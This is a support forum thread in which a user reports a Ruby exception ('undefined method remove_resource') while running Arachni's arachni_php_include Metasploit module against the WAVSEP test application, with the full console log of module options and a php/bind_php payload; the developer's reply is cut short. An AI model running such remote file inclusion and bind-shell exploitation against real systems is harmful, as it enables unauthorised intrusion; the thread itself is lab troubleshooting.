Got exception while using arachni_php_include msf plugin to exploit rfi vulnerability
Hi Tasos,
I ran an Arachni scan against WAVSEP (https://code.google.com/p/wavsep/),
particularly the RFI section, and I got the metareport containing
lots of RFI vulnerabilities. Then I loaded the metareport into
Metasploit, picked one vulnerability and tried to use arachni_manual to
exploit it.
But I got an exception: [-] Exploit failed: undefined method
`remove_resource' for nil:NilClass. Is this a normal way of saying
"cannot exploit"? Or is it an unexpected Ruby exception that needs
debugging?
Below is the output I got on the terminal:
msf exploit(arachni_php_include) > arachni_manual 5
[*] Using unix/webapp/arachni_php_include .
[*] Preparing datastore for 'Remote File Inclusion' vulnerability @ 10.1.10.129/wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp ...
SRVHOST => 127.0.0.1
SRVPORT => 14471
RHOST => 10.1.10.129
RPORT => 8080
LHOST => 127.0.0.1
LPORT => 6054
SSL => false
GET => target=XXinjectionXX
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE
PATH => /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
[*] Done!
PAYLOAD => php/bind_php
msf exploit(arachni_php_include) > show options
Module options (exploit/unix/webapp/arachni_php_include):
Name     Current Setting        Required  Description
COOKIES                         no        Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
GET      target=XXinjectionXX   no        GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
HEADERS  Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE  no  Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
PATH     /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp  yes  The path to the vulnerable script.
POST                            no        POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
Proxies                         no        Use a proxy chain
RHOST    10.1.10.129            yes       The target address
RPORT    8080                   yes       The target port
SRVHOST  127.0.0.1              yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  14471                  yes       The local port to listen on.
SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                         no        The URI to use for this exploit (default is random)
VHOST                           no        HTTP server virtual host
Payload options (php/bind_php):
Name     Current Setting        Required  Description
LPORT    6054                   yes       The listen port
RHOST    10.1.10.129            no        The target address
Exploit target:
Id Name
0 Automatic
msf exploit(arachni_php_include) > exploit
[*] Using URL: http://127.0.0.1:14471/LiCArBFVeO
[*] PHP include server started.
[*] Started bind handler
[*] Sending HTTP request for /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
Support Staff 1 Posted by Tasos Laskos on 11 Jun, 2014 05:57 PM
Hi there,
As the relevant file already says:
Cheers
Tasos Laskos closed this discussion on 11 Jun, 2014 05:57 PM.